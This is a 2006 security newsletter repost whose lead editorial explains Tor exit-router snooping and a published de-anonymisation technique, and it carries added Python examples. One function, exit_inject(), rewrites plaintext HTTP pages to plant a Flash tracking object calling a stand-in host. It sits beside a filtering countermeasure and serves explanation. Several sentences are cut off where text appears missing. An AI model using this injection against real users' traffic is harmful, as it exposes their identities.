[ISN] The Onion Router Downside
From: InfoSec News (alerts@infosecnews.org)
Date: Thu Oct 26 2006 - 03:54:23 CDT
PLEASE VISIT OUR SPONSORS, WHO BRING YOU SECURITY UPDATE FOR FREE:
Security Measurement is Vital to Program Success
Making the Case for E-mail Archiving and Litigation Readiness
The Starter PKI Program
=== CONTENTS ===================================================
IN FOCUS: The Onion Router Downside
NEWS AND FEATURES
- Microsoft Releases WPA2 Support, Modifies Wi-Fi Client Behavior
- Zero-Day Vulnerability in PowerPoint
- Microsoft Re-releases Security Bulletin for Windows 2000
- McAfee Acquires Onigma, Introduces Data Loss Prevention Solution
- Recent Security Vulnerabilities
GIVE AND TAKE
- Security Matters Blog: Bitter News for VM Users, There's a Rootkit
Made Just for You
- FAQ: Command Lists All Members of an AD Group
- From the Forum: Making the C Drive Invisible Yet Readable
- Know Your IT Security Contest
- Make Your Mark on the IT Community!
- Comprehensive Protection for Endpoints at Work and at Home
- Wanted: Your Reviews of Products
RESOURCES AND EVENTS
FEATURED WHITE PAPER
=== SPONSOR: Solutionary =======================================
Security Measurement is Vital to Program Success
Security managers face challenges technically and organizationally
in gaining program support and focus. Effective security measurement
can help ingrain the issue into the performance management process and
culture of the organization. Read this white paper.
=== IN FOCUS: The Onion Router Downside ========================
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net
Two weeks ago, I wrote about a portable Web browser, Torpark, that's
designed to keep you relatively anonymous as you browse. Torpark is
based on the Mozilla Firefox source code, and you might recall that one
of the big advantages of using Torpark is that it comes with The Onion
Router (Tor) built in. So you don't need to install and configure that
separately. If you missed that editorial, you can read it at the URL
Tor consists of a client that presents a SOCKS proxy to local
applications and a network of volunteer-run servers (onion routers)
that pass traffic along a series of hops--three by default, although
the Tor client's configuration can change that. Anyone can run a Tor
client or server. As a client, the only thing you reveal to the outside
world is your IP address, and that address is made known only to the
first Tor server your traffic passes through. (A server's own address,
by contrast, is published in the Tor directory so that clients can find
it.)
Traffic is encrypted in layers by Tor along the route, and each Tor
router knows only the router immediately before it and the one
immediately after it. Tor handles its own traffic encryption, so in
theory, Tor server operators shouldn't be able to snoop on the contents
of your network traffic. The exception is the operator of the exit
router--the last hop along your traffic's route through Tor servers.
Other servers on the Internet don't understand Tor encryption, so
obviously they can't receive and process traffic in that form.
Therefore the traffic must be decrypted before being passed on to its
final destination, and what the exit router sees is exactly what your
application sent: if the application protocol is plaintext, as ordinary
HTTP on port 80 is, the exit operator can read it. Tor doesn't add
end-to-end encryption for you; only something like HTTPS between your
browser and the destination does that. And therein resides Tor's
inherent weakness. You must trust an unknown Tor server operator not to
snoop on your traffic as it exits the Tor network. Inevitably, some Tor
server operators do snoop on traffic. That's why I said that Tor
provides "relative" anonymity. It protects your actual IP address but
not the nature of what you're doing on the Internet.
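To make the per-hop visibility concrete, here is a toy model of the
layered encryption described above, added as an example for this page
and not code from the newsletter or from Tor itself. It wraps a request
in three layers keyed to a guard, a middle and an exit relay, has each
relay strip one layer, and records what each relay could observe. The
relay names, keys, client address and HTTP request are constructed, and
the per-hop cipher is a throwaway SHA-256 keystream, not Tor's actual
cell encryption or circuit handshake.

```python
"""Toy model of the layered ("onion") encryption described above.

Added example for this page, not code from the newsletter or from Tor.
Tor's real protocol (TLS between relays, a Diffie-Hellman handshake per
hop, AES-CTR on fixed-size cells) is far more involved; the per-hop cipher
here is a throwaway SHA-256 keystream that exists only to make the
layering visible.
"""
import hashlib
import json


def _keystream_xor(key: bytes, data: bytes) -> bytes:
    """XOR `data` with a SHA-256 counter-mode keystream (toy, symmetric)."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hashlib.sha256(key + offset.to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[offset:offset + 32], block))
    return bytes(out)


def build_onion(relays, dest: str, payload: bytes) -> bytes:
    """Client side.  `relays` is an ordered list of (name, key) for the
    guard, middle and exit.  The innermost layer, readable only by the exit,
    carries the destination and the application data; every outer layer
    carries nothing but the name of the next hop."""
    inner = {"next": dest, "data": payload.decode("latin-1")}
    blob = _keystream_xor(relays[-1][1], json.dumps(inner).encode())
    for i in range(len(relays) - 2, -1, -1):          # wrap middle, then guard
        layer = {"next": relays[i + 1][0], "data": blob.decode("latin-1")}
        blob = _keystream_xor(relays[i][1], json.dumps(layer).encode())
    return blob


def peel(key: bytes, blob: bytes):
    """Relay side: strip one layer.  Returns (next_hop, remaining_bytes)."""
    layer = json.loads(_keystream_xor(key, blob).decode())
    return layer["next"], layer["data"].encode("latin-1")


def can_read(key: bytes, blob: bytes) -> bool:
    """Whether the holder of `key` can open the outermost layer of `blob`."""
    try:
        peel(key, blob)
        return True
    except (ValueError, UnicodeDecodeError, TypeError, KeyError):
        return False


def route(relays, client_ip: str, blob: bytes) -> dict:
    """Walk the circuit and record what each relay could observe: who handed
    it the data, whom it forwards to, and (exit only) the plaintext."""
    observed, prev = {}, client_ip
    for i, (name, key) in enumerate(relays):
        next_hop, blob = peel(key, blob)
        is_exit = i == len(relays) - 1
        observed[name] = {"from": prev, "to": next_hop,
                          "payload": blob if is_exit else None}
        prev = name
    return observed


if __name__ == "__main__":
    # Constructed circuit and request; none of these values are real.
    circuit = [("guard", b"guard-key"), ("middle", b"middle-key"),
               ("exit", b"exit-key")]
    request = (b"GET /inbox HTTP/1.0\r\nHost: mail.example.test\r\n"
               b"Cookie: sid=7f3a\r\n\r\n")
    onion = build_onion(circuit, "mail.example.test:80", request)
    for relay, view in route(circuit, "198.51.100.7", onion).items():
        print(relay, view)
```

Running it shows the guard holding the client address but only
ciphertext, the middle holding neither address nor plaintext, and the
exit holding the destination together with the full HTTP request,
cookie included. Had the request been carried inside TLS, the exit
would still see the destination but the "payload" would be opaque.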
Anyone who can see your Internet traffic can also manipulate it. This
certainly holds true for Tor exit server operators, and it presents
another danger of using Tor. In one of many possible scenarios, someone
could monitor for traffic destined for port 80, typically used for Web
traffic, and then manipulate Web pages, cookies, headers, and so on in
just about any way you can imagine. Now someone has proven just how
easy it is to use this weakness to discover your real IP address, which
in effect destroys your anonymity and thus defeats the purpose of using
"Practical Onion Hacking, Finding the real address of Tor clients" (at
the URL below), is a white paper produced by the FortConsult Security
Research Team and published on the Packet Storm Security Web site. The
paper shows, step by step, how the researchers were able to use readily
available scripts and software packages to inject a "Web bug" into Web
traffic. The Web bug is a typical cookie designed and used in
When Tor is used directly (i.e., without a go-between, which I'll
explain in a moment), either of those two technologies will reveal the
cookie and thus the real IP address of the user.
the address can be placed in a cookie that can be read by a Web server.
Flash doesn't understand the SOCKS protocol at all, so if a Flash
object opens a network connection of its own for whatever reason, that
connection leaves your machine directly, completely bypassing the Tor
network, and the server on the other end sees your real IP address.
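What "understanding SOCKS" amounts to on the wire, as an added example
(not code from the newsletter or from the Tor project): the minimal
SOCKS4a CONNECT an application sends to the Tor client's local SOCKS
port, 9050 by default, beside the plain SOCKS4 form for contrast. The
host example.test and the address 192.0.2.10 are constructed. A plug-in
that never issues a request like this simply opens its own TCP
connection, which is the bypass described above.

```python
"""Minimal SOCKS4a client for the Tor client's local SOCKS port.

Added example for this page, not code from the newsletter or from the Tor
project.  It shows what "understanding SOCKS" means on the wire: the
application has to hand the connection to the Tor client explicitly, and
with SOCKS4a it hands over the destination hostname, so no DNS lookup
happens on your own machine.  The host example.test and the address
192.0.2.10 are constructed.
"""
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 0x01
REPLY_GRANTED = 0x5A


def socks4a_connect_request(host: str, port: int, userid: bytes = b"") -> bytes:
    """VN | CD | DSTPORT | DSTIP=0.0.0.1 (means 'hostname follows') |
    USERID NUL | HOSTNAME NUL.  The name travels unresolved to Tor, which
    resolves it at the exit, not on your machine."""
    return (struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, port)
            + bytes([0, 0, 0, 1])
            + userid + b"\x00"
            + host.encode("idna") + b"\x00")


def socks4_connect_request(ip: str, port: int, userid: bytes = b"") -> bytes:
    """Plain SOCKS4 for contrast: the caller supplies a resolved IP, meaning
    a DNS query for the name already left the machine outside Tor."""
    return (struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, port)
            + socket.inet_aton(ip)
            + userid + b"\x00")


def parse_socks4_reply(reply: bytes) -> bool:
    """Eight-byte reply: VN=0, CD=0x5A granted or 0x5B-0x5D refused, then
    a port and address that Tor fills with zeros."""
    if len(reply) != 8 or reply[0] != 0:
        raise ValueError("malformed SOCKS4 reply: %r" % (reply,))
    return reply[1] == REPLY_GRANTED


def connect_via_tor(host: str, port: int, tor=("127.0.0.1", 9050), timeout=10.0):
    """Open a TCP stream to host:port through a running Tor client.
    Whatever is written to the returned socket is what the exit router
    sees, unless the application protocol encrypts it itself."""
    sock = socket.create_connection(tor, timeout=timeout)
    sock.sendall(socks4a_connect_request(host, port))
    reply = sock.recv(8)
    if not parse_socks4_reply(reply):
        sock.close()
        raise ConnectionError("Tor refused the SOCKS connect (code 0x%02x)"
                              % reply[1])
    return sock


if __name__ == "__main__":
    # Offline demonstration of the two request formats (no Tor needed).
    print("SOCKS4a:", socks4a_connect_request("example.test", 80).hex(" "))
    print("SOCKS4: ", socks4_connect_request("192.0.2.10", 80).hex(" "))
```

The 4a form matters as much as using SOCKS at all: with plain SOCKS4
the application resolves the name itself, so a DNS query leaves the
machine outside Tor and your resolver learns the destination even though
the TCP connection is anonymized. Privoxy's forward-socks4a directive
does the same hand-off on behalf of applications that only speak HTTP
proxy.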
As I suggested earlier, there is a way to reduce both of these
weaknesses--by using a standard proxy server as a go-between between
client applications and the Tor client. One such proxy server is
content. Privoxy can forward the requests it receives to a SOCKS proxy,
so it can be configured to send traffic through the Tor client (its
forward-socks4a directive, pointed at the Tor client's SOCKS port).
Plug-ins such as Flash that honor the browser's HTTP proxy settings then
have their Web requests carried through Tor as well. That helps only as
far as a plug-in actually uses the proxy, though: a Flash or Java
object that opens its own socket, or that reads the machine's own
interface address and reports it, still leaks. If anonymity matters,
the safer course is to disable Flash and Java in the browser you use
with Tor.
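To show what an exit operator can do with a plaintext page and what a
filtering go-between can undo, here is a model of both sides, added as
an example for this page; it is not code from the newsletter, from the
FortConsult paper or from Privoxy. exit_inject() rewrites an HTTP
response the way a hostile exit might, inserting a Flash <object> that
points at a tracking host just before </body> and fixing up
Content-Length; proxy_filter() strips object, embed and applet elements
from HTML before it reaches the browser. The response, the tracking
host bug.example and the tag are constructed, and the regex filter is
deliberately crude. Neither side can touch a response carried over
HTTPS.

```python
"""Exit-router tampering and a filtering go-between, modelled side by side.

Added example for this page, not code from the newsletter, the FortConsult
paper or Privoxy.  Sample response, the host bug.example and the injected
tag are constructed.  The filter is a crude regex, enough to show the idea;
a real content filter would parse the HTML.
"""
import re

SAMPLE_BODY = b"<html><body><p>hello from a plain HTTP site</p></body></html>"


def make_response(body: bytes, content_type: bytes = b"text/html") -> bytes:
    """Build a minimal HTTP/1.0 response (constructed sample traffic)."""
    return (b"HTTP/1.0 200 OK\r\nContent-Type: " + content_type
            + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\n\r\n" + body)


def split_http_response(raw: bytes):
    """Return (status_line, {lowercased-name: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def join_http_response(status: bytes, headers: dict, body: bytes) -> bytes:
    """Reassemble a response, recomputing Content-Length for the new body."""
    headers[b"content-length"] = str(len(body)).encode()
    head = b"\r\n".join([status] + [k + b": " + v for k, v in headers.items()])
    return head + b"\r\n\r\n" + body


# The "Web bug": a Flash object fetched from a host the attacker controls.
# Flash ignores SOCKS, so the fetch goes out directly from the victim.
WEB_BUG = (b'<object type="application/x-shockwave-flash" '
           b'data="http://bug.example/track.swf"></object>')


def exit_inject(raw: bytes) -> bytes:
    """What a hostile exit can do to a plaintext HTTP response: only HTML
    is touched, the object goes in before </body>, and Content-Length is
    corrected so the browser notices nothing."""
    status, headers, body = split_http_response(raw)
    if not headers.get(b"content-type", b"").startswith(b"text/html"):
        return raw
    idx = body.lower().rfind(b"</body>")
    body = body[:idx] + WEB_BUG + body[idx:] if idx >= 0 else body + WEB_BUG
    return join_http_response(status, headers, body)


# object/applet are paired elements; embed is a single tag.
PLUGIN_ELEMENT = re.compile(rb"<(object|applet)\b.*?</\1\s*>|<embed\b[^>]*>",
                            re.I | re.S)


def proxy_filter(raw: bytes) -> bytes:
    """Filtering go-between: drop plug-in elements from HTML responses so a
    bug injected upstream never reaches Flash or Java in the browser."""
    status, headers, body = split_http_response(raw)
    if not headers.get(b"content-type", b"").startswith(b"text/html"):
        return raw
    return join_http_response(status, headers, PLUGIN_ELEMENT.sub(b"", body))


if __name__ == "__main__":
    page = make_response(SAMPLE_BODY)
    tampered = exit_inject(page)
    print(tampered.decode())
    print("--- after filter ---")
    print(proxy_filter(tampered).decode())
```

Note what the filter does and does not buy you: it removes the vector
the paper used, but only for pages that pass through it, and a plug-in
that is already running keeps whatever network access it has. Disabling
the plug-ins removes the problem at the source.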
If you're interested in Tor's weaknesses, or even in how easy it is to
manipulate network traffic, then be sure to read the white paper.
A note from Mark Minasi: I wanted to pass along some information about
a show that I'm not speaking at but that looks like a good deal. It's a
$129, one-day interoperability road show from Penton, the folks who put
out this newsletter.
If you're like most folks, "interop" isn't just a buzzword, it's a
daily headache. If we all used the same operating system, directory
service, and database engines, then life would be a lot easier, but
most of us can't. Worse yet, interop info can be hard to come by,
because no vendor's all that excited about helping you use any products
In response to that, Penton's put together a show with four tracks,
each geared to a solution. One features Dustin Puryear talking about
making Windows, Linux, and Unix work together. The second offers a day
of Active Directory expert Gil Kirkpatrick on integrating AD with other
LDAP directory services. At the same time, database techie Randy Dyess
explains how to solve data interoperability problems by making
different databases replicate amongst one another and produce
integrated reports, as well as how to integrate dissimilar relational
database engines. Last but not least, popular Windows IT Pro veteran
author Mike Otey tackles what may be the single best new IT technology
of the past few years--virtualization.
Tech X World is coming to Chicago, Dallas, and San Francisco in the
next week, and you can find out more at
=== SPONSOR: Symantec ==========================================
Making the Case for E-mail Archiving and Litigation Readiness
Are your messages easily accessible, yet secure, in the case of an
e-discovery request? With the phenomenal email volume growth, and
increasing costs when companies fail to comply, you can't afford to
lose an email. Download this free whitepaper today and implement a
strong email retention and management system today!
=== SECURITY NEWS AND FEATURES =================================
Microsoft Releases WPA2 Support, Modifies Wi-Fi Client Behavior
Microsoft announced the release of a security update for Windows XP
SP2 that introduces support for WPA2 and changes the behavior of
wireless clients to be more secure.
Zero-Day Vulnerability in PowerPoint
A zero-day vulnerability has been discovered in Microsoft
PowerPoint. According to available information, the vulnerability can
potentially be exploited to execute arbitrary code on an affected
system if a user opens a malicious PowerPoint file. Proof-of-concept
code has been published to demonstrate the problem. Microsoft is aware
of the problem and is investigating the matter; however, no patch is
available at this time.
Microsoft Re-releases Security Bulletin for Windows 2000
Late last week, Microsoft re-released Security Bulletin MS06-061
(Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code
Execution) to correct a problem with the previous update, which didn't
correctly set the kill bit for Microsoft XML Parser 2.6.
McAfee Acquires Onigma, Introduces Data Loss Prevention Solution
McAfee announced that it acquired data protection solutions provider
Onigma. The acquisition brings McAfee the ability to offer solutions to
monitor and report on confidential data as well as to prevent its loss.
Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
=== SPONSOR: Thawte ============================================
The Starter PKI Program
Securing multiple domains or host names? Learn how the Starter PKI
program can save time and reduce costs, and provide you with a multiple
digital certificate account.
=== GIVE AND TAKE ==============================================
SECURITY MATTERS Blog: Bitter News for VM Users, There's a Rootkit Made
Just for You
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=935:7EB890
With every innovation comes a setback, sometimes vitriolic in nature.
Virtual machine (VM) technology is a good case in point. Read this blog
article to discover how intruders are bound to invade VMs, by hook or
FAQ: Command Lists All Members of an AD Group
by John Savill, http://list.windowsitpro.com/t?ctl=932:7EB890
Q: How can I use a command to list all the members of an Active
Directory (AD) group?
Find the answer at
FROM THE FORUM: Making the C Drive Invisible Yet Readable
A forum participant wants to know how to make the C drive invisible
yet still readable. He wants the drive hidden from users but wants them
to be able to access all the programs on the system. Join the
KNOW YOUR IT SECURITY Contest
Share your security-related tips, comments, or solutions in 1000
words or less, and you could be one of 13 lucky winners of a Zune media
player. Tell us how you do patch management, share a security script,
or write about a security article you've read or a Webcast you've
viewed. Submit your entry between now and December 13. We'll select the
13 best entries, and the winners will receive a Zune media player--
plus, we'll publish the winning entries in the Windows IT Security
newsletter. Email your contributions to tipswinitsecwindowsitpro.com.
Prizes are courtesy of Microsoft Learning Paths for Security:
MAKE YOUR MARK ON THE IT COMMUNITY!
Nominate yourself or a peer to become an "IT Pro of the Month."
Winners will receive over $600 in IT resources and be featured in
Windows IT Pro magazine and the TechNet Flash email newsletter. It's
easy to enter--accepting October nominations for a limited time! Submit
your nomination today:
=== PRODUCTS ===================================================
by Renee Munshi, products@windowsitpro.com
Comprehensive Protection for Endpoints at Work and at Home
eEye Digital Security released version 2.5 of Blink Professional,
its host-based firewall, intrusion prevention, and anti-malware
solution, and added portable-storage-device control, application
control, and "dynamic" control that allows different policies to be in
effect depending on whether the client is physically connected to the
network or is outside the network perimeter. A new offering, Blink
Personal, which includes most of the functionality of Blink Pro, is
available for free to home users, who are invited to participate in a
Neighborhood Watch program that sends "attack data" anonymously and
automatically from Blink Pro to the eEye Research Lab. The data will
help eEye continue to improve its products' attack detection and
prevention capabilities. For more information, go to
WANTED: your reviews of products you've tested and used in
production. Send your experiences and ratings of products to
whatshot@windowsitpro.com and get a Best Buy gift certificate.
=== RESOURCES AND EVENTS =======================================
For more security-related resources, visit
In an environment where there is no one true OS, users must access a
variety of applications across several platforms. Get the tools you
need to analyze and improve how you manage access across Windows
Terminal Services, UNIX and Linux X, Windows, legacy telnet, and even
SSH. TechX World events start October 24--register today!
How will compliance regulations affect your IT infrastructure? Help
design your retention and retrieval, privacy and security policies to
make sure that your organization is compliant. Download the free eBook
Did you know that 75% of corporate intellectual property resides in
email? With security concerns from viruses and malware, increasing
amounts of spam, and ever-stronger performance demands for availability
and recovery, email systems have become the most important business
application. Join us for this free Web seminar and learn a holistic
approach to managing the challenges of security, availability and
control. Live Event: Thursday, November 16
How do you manage vulnerabilities? If you depend on vulnerability
assessments to determine the state of your IT security systems, you
can't miss this Web seminar. Special research from Gartner indicates
that deeper penetration is needed to augment your vulnerability
management processes. Learn more today!
Take the necessary steps for application management, from conversion of
legacy applications to MSI to customizing applications to fit corporate
standards. Don't overlook an important component of an OS migration--
join us for the free on-demand Web seminar.
=== FEATURED WHITE PAPER =======================================
Help your small- or medium-sized business protect one of its most
valuable assets--business information. Easily store, manage, protect
and share information with hardware designed with the needs of your
business in mind. Manage IT without the large staff and extensive
training--learn how today!
Special Offer: Download any white paper from Windows IT Pro before
October 31 and enter to win a Casio Exilim Card Camera! The more you
download, the more chances to win! Visit
http://list.windowsitpro.com/t?ctl=937:7EB890 for a full listing of white
papers and contest rules.
=== ANNOUNCEMENTS ==============================================
Invitation for VIP Access
Become a VIP Monthly Pass subscriber and get instant online access
to every article published in our network. You'll get full Web access
to Windows IT Pro, SQL Server Magazine, and the Exchange and Outlook
Administrator, Windows Scripting Solutions, and Windows IT Security
newsletters--that's more than 26,000 articles at your fingertips. Sign
up now for only $29.95 per month:
Get $40 off on Windows IT Pro
Subscribe to Windows IT Pro today and SAVE up to $40! Along with
your 12 issues, you'll get FREE access to the entire Windows IT Pro
online article archive, which houses more than 9,000 helpful IT
articles. This is a limited-time offer, so order now:
Security UPDATE is brought to you by the Windows IT Pro Web site's
Security page (first URL below) and the Windows IT Security newsletter
(subscribe at the second URL below).
Subscribe to Security UPDATE at
Be sure to add Security_UPDATE@list.windowsitpro.com
to your antispam software's list of allowed senders.
To contact us:
About Security UPDATE content -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=939:7EB890
About your product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com
Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department
Copyright 2006, Penton Media, Inc. All rights reserved.
Visit the InfoSec News store!